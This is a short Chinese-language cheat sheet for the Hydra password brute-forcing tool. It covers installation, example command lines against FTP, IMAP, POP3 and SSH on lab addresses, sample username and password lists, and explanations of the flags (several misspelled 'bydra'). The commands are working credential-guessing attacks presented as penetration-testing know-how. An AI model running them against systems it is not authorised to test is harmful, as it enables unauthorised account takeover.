hydra [海德拉]
海德拉(Hydra):希腊神话中的九头蛇,是西方的神话生物,在古希腊神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。 hydra是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
# yum install -y epel-release
# yum install -y hydra
Examples:
# hydra -l user -P passlist.txt ftp://192.168.0.1
# hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
# hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
# hydra -l admin -p password ftp://[192.168.0.0/24]/
#hydra -L logins.txt -P pws.txt -M targets.txt ssh
[root@localhost ~]# hydra -l root -P pass.dic 192.168.106.134 ssh
[root@localhost ~]# cat userlist.txt
admin
root
tianyun
yangge
zhuzhuxia
[root@localhost ~]# cat passlist.txt
123
abc,123
root
admin
owaspbwa
yangge
# hydra -L userlist.txt -P passlist.txt -t 20 192.168.106.134 ssh参数解释
hydra -l 指定用户名
hydra -L 制定user文件。
hydra -p 指定密码。
hydra -P 制定密码文件
hydra -M 指定要攻击服务列表,“:”后面跟端口
hydra -S 指定ssl连接
hydra -s 如果不在默认端口就要指定使用-s指定端口
bydra -e 尝试密码为空
bydra -u 循环使用用户
bydra -C 使用文件内login:pass 分隔。
bydra -c 在所有线程上每次登录尝试的等待时间
hydra -o 将找到的登陆/密码写入文件
hydra -b 指定-o文件类型
hydra -t 运行任务每个目标并行连接的数目(默认值:16)
